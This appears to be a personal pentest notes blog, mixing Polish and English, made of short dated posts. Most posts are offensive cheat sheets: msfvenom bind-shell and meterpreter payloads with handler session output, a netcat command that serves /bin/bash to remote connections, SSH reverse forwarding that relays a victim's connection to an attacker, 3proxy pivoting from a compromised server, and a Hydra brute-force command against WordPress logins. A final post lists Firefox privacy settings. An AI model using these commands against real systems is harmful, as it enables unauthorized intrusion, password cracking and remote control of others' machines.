czwartek, 28 lutego 2019

Merge DLL files into EXE

https://www.youtube.com/watch?v=a_r3tQ06xpE

C:\Program Files (x86)\Microsoft\ILMerge>ILMerge.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\SSHapp.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\Renci.SshNet.dll /out:C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\zobaczSam.exe /target:exe /targetplatform:"v4,C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.0"

Download ILMerge: https://www.microsoft.com/en-us/download/confirmation.aspx?id=17630

OR (simply)

Install package from Microsoft Visual Studio

Tools->NuGet Package Manager -> Package manager Console

Install-Package Costura.Fody


środa, 30 stycznia 2019

Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS.

in /etc/ssl/openssl.cnf

from

CipherString=DEFAULT@SECLEVEL=2
to 
CipherString=DEFAULT 


wtorek, 29 stycznia 2019

Przekazywanie portu w Linux np. dla Metasploit

Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę:
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący

W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH

W tym celu na komputerze B dodać:

do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd

Na komputerze A wykonać polecenie:

ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b

Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444


Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888

środa, 23 stycznia 2019

Pivoting


Jeśli potrzebujesz z serwera, na którym zdobyłeś powłokę dostać się do zasobów sieci lokalne to użyj 3proxy

Serwer na którym zdobyłeś powłokę:

wget https://github.com/z3APA3A/3proxy/archive/0.8.12.tar.gz
tar zxvf 0.8.12.tar.gz
cd 3proxy
make -f Makefile.Linux
cp src/3proxy . 
printf "auth none\nsocks -p31337\n" > 3conf
./3proxy 3conf & Teraz masz socks proxy nasłuchujące na porcie 31337 i możesz użyć np proxychains


BONUS:
https://github.com/klsecservices/rpivot  <- reverse proxy

czwartek, 10 stycznia 2019

Hydra cheat sheet

Wordpress:

hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'

środa, 12 grudnia 2018

bind shellmsvenom bind shell:

vitim:
msfvenom -p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w
netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080 <-- attacker


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf
chmod +x shell_meterpreter_bind_2223.elf
./shell_meterpreter_bind_2223.elf

attacker:
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2223             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223
[*] Sending stage (861480 bytes) to 172.21.65.139
[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >

środa, 7 listopada 2018

Hardening firefox

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprint = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true


Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/ Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/